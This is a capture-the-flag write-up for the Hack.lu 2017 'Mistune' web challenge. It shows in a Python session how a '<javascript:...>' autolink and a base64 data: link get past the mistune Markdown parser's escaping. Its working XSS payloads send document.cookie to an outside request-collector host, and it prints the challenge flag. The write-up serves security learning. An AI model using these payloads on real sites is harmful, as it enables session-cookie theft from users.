Hack.lu CTF 2017 - Write-up

Information#

Version#

By Version Comment
noraj 1.0 Creation

CTF#

150 Mistune - Web#

Markdown parsers are fun. Now click here and steal the cookie!

RTFM: http://mistune.readthedocs.io/en/latest/

  • escape: if set to False, all raw html tags will not be escaped.
  • hard_wrap: if set to True, it will has GFM line breaks feature. All new lines will be replaced with
    tag

Normally Markdown accepts HTML tags but they will be escaped by the renderer here.

So it seems there is a filtering on the input but not the output. Error!

Let's try it locally:

1
2
3
4
5
6
7
8
9
$ python3
Python 3.6.2 (default, Jul 20 2017, 03:52:27)
[GCC 7.1.1 20170630] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import mistune
>>> renderer = mistune.Renderer(escape=True, hard_wrap=True)
>>> markdown = mistune.Markdown(renderer=renderer)
>>> markdown('[a](data:text/html;base64,ZG9jdW1lbnQubG9jYXRpb249Imh0dHBzOi8vcmVxdWVzdGIuaW4veGVjdzloeGU/Y29va2llPSIgKyBkb2N1bWVudC5jb29raWU7)')
'<p><a href="data:text/html;base64,ZG9jdW1lbnQubG9jYXRpb249Imh0dHBzOi8vcmVxdWVzdGIuaW4veGVjdzloeGU/Y29va2llPSIgKyBkb2N1bWVudC5jb29raWU7">a</a></p>\n'

The rendered content seems good with the base64 trick, it worked on my browser but not with the bot.

Check if HTML tags are really escaped:

1
2
>>> markdown('<p>')
'&lt;p&gt;'

Normal html tags are escaped. Let's continue:

1
2
3
4
>>> markdown('<javascript>')
'&lt;javascript&gt;'
>>> markdown('<javascript:>')
'<p>&lt;javascript:&gt;</p>\n'

Invalid tags are too.

1
2
>>> markdown('<javascript:=>')
'<p><a href="javascript:=">javascript:=</a></p>\n'

What???? The rendered just created a link with <javascript:=>! Ok seems good just do it:

1
2
>>> markdown("<javascript:document.location='https://requestb.in/xecw9hxe?cookie='+document.cookie;>")
'<p><a href="javascript:document.location=\'https://requestb.in/xecw9hxe?cookie=\'+document.cookie;">javascript:document.location=\'https://requestb.in/xecw9hxe?cookie=\'+document.cookie;</a></p>\n'

100% valid link. Just send it to the bot and collect the flag flag{92da883eb1df9d1287ff25f1a1099f29}!

Share